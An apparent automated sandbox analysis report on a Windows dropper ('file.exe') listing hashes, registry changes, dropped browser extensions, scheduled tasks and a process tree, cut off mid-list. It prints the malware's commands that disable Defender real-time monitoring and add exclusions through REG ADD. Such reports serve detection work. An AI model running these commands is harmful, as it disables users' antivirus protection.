Analysis
-
max time kernel
133s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
04-01-2023 07:36
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
178a524a1b619894ee72c7c7abb25343
-
SHA1
77589b0f93c6aa3dcb40582c459fb19bd1220ad8
-
SHA256
f8022a3007392c0cc9b0fa2ddabf99472df363a39ced015981695baba91dd0ca
-
SHA512
f0c3f030f9f7c9deec4368fd9c96ccc0d543b2f0ad6c9f632c3654cb71e4a1dbf4888a17d4be8c04119b5238e7852fdb1d7907b15695887f5681eff5ebce3f6e
-
SSDEEP
196608:91Ol0667Cvi89zveKlvZ+PzHCI6xNKGawIgQHMQQM:3Oq667Y9H+PLWKGDG
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UPpgYDaaU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ixeeJgwLjCKU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\PZZtgzkizptCKcVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TxHUzkpwYBplqcjW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hrqGEdoywWohC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hrqGEdoywWohC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ixeeJgwLjCKU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TxHUzkpwYBplqcjW = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TxHUzkpwYBplqcjW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR = "0" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TxHUzkpwYBplqcjW = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wtSimwBHoNUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wtSimwBHoNUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\PZZtgzkizptCKcVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UPpgYDaaU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 1096 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1688 Install.exe 1388 Install.exe 1896 KzHFZKW.exe 1620 xZnOiNv.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation xZnOiNv.exe -
Loads dropped DLL 12 IoCs
pid Process 1484 file.exe 1688 Install.exe 1688 Install.exe 1688 Install.exe 1688 Install.exe 1388 Install.exe 1388 Install.exe 1388 Install.exe 1096 rundll32.exe 1096 rundll32.exe 1096 rundll32.exe 1096 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json xZnOiNv.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol KzHFZKW.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xZnOiNv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xZnOiNv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 xZnOiNv.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol KzHFZKW.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xZnOiNv.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini KzHFZKW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xZnOiNv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D xZnOiNv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D xZnOiNv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 xZnOiNv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat xZnOiNv.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xZnOiNv.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\UPpgYDaaU\RKHVJs.dll xZnOiNv.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xZnOiNv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xZnOiNv.exe File created C:\Program Files (x86)\ixeeJgwLjCKU2\RRgKAHvVgJZsx.dll xZnOiNv.exe File created C:\Program Files (x86)\wtSimwBHoNUn\xNKkrkE.dll xZnOiNv.exe File created C:\Program Files (x86)\hrqGEdoywWohC\QneYufr.xml xZnOiNv.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xZnOiNv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xZnOiNv.exe File created C:\Program Files (x86)\UPpgYDaaU\nkfwVzX.xml xZnOiNv.exe File created C:\Program Files (x86)\ixeeJgwLjCKU2\BoQpgqd.xml xZnOiNv.exe File created C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR\NXNaEgL.dll xZnOiNv.exe File created C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR\kbpUZfF.xml xZnOiNv.exe File created C:\Program Files (x86)\hrqGEdoywWohC\sWloPEu.dll xZnOiNv.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bAwQExQPiZaafeCamU.job schtasks.exe File created C:\Windows\Tasks\eGVBkLkPwgEdMrpNZ.job schtasks.exe File created C:\Windows\Tasks\vQAvJIyZdbNJknC.job schtasks.exe File created C:\Windows\Tasks\VsXBqhRBjzCeDtAuY.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1672 schtasks.exe 1648 schtasks.exe 1924 schtasks.exe 1324 schtasks.exe 836 schtasks.exe 1276 schtasks.exe 584 schtasks.exe 1336 schtasks.exe 1848 schtasks.exe 1176 schtasks.exe 1208 schtasks.exe 1744 schtasks.exe 616 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecision = "0" xZnOiNv.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadNetworkName = "Network 2" xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\9e-6f-1a-e7-0f-fc xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632} xZnOiNv.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xZnOiNv.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" xZnOiNv.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecisionReason = "1" xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecision = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs xZnOiNv.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecision = "0" xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs xZnOiNv.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs xZnOiNv.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecisionTime = 50f476800f20d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad xZnOiNv.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecisionTime = 50f476800f20d901 xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs xZnOiNv.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs xZnOiNv.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs xZnOiNv.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs xZnOiNv.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecisionTime = 50f476800f20d901 xZnOiNv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs xZnOiNv.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1856 powershell.EXE 1856 powershell.EXE 1856 powershell.EXE 1704 powershell.EXE 1704 powershell.EXE 1704 powershell.EXE 1888 powershell.EXE 1888 powershell.EXE 1888 powershell.EXE 684 powershell.EXE 684 powershell.EXE 684 powershell.EXE 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe 1620 xZnOiNv.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1856 powershell.EXE Token: SeDebugPrivilege 1704 powershell.EXE Token: SeDebugPrivilege 1888 powershell.EXE Token: SeDebugPrivilege 684 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1484 wrote to memory of 1688 1484 file.exe 27 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1688 wrote to memory of 1388 1688 Install.exe 28 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 1900 1388 Install.exe 30 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1388 wrote to memory of 616 1388 Install.exe 32 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 1900 wrote to memory of 1244 1900 forfiles.exe 34 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 616 wrote to memory of 1600 616 forfiles.exe 35 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1244 wrote to memory of 1908 1244 cmd.exe 36 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1600 wrote to memory of 1888 1600 cmd.exe 37 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1244 wrote to memory of 2000 1244 cmd.exe 38 PID 1600 wrote to memory of 436 1600 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\7zSC51.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\7zS19D8.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
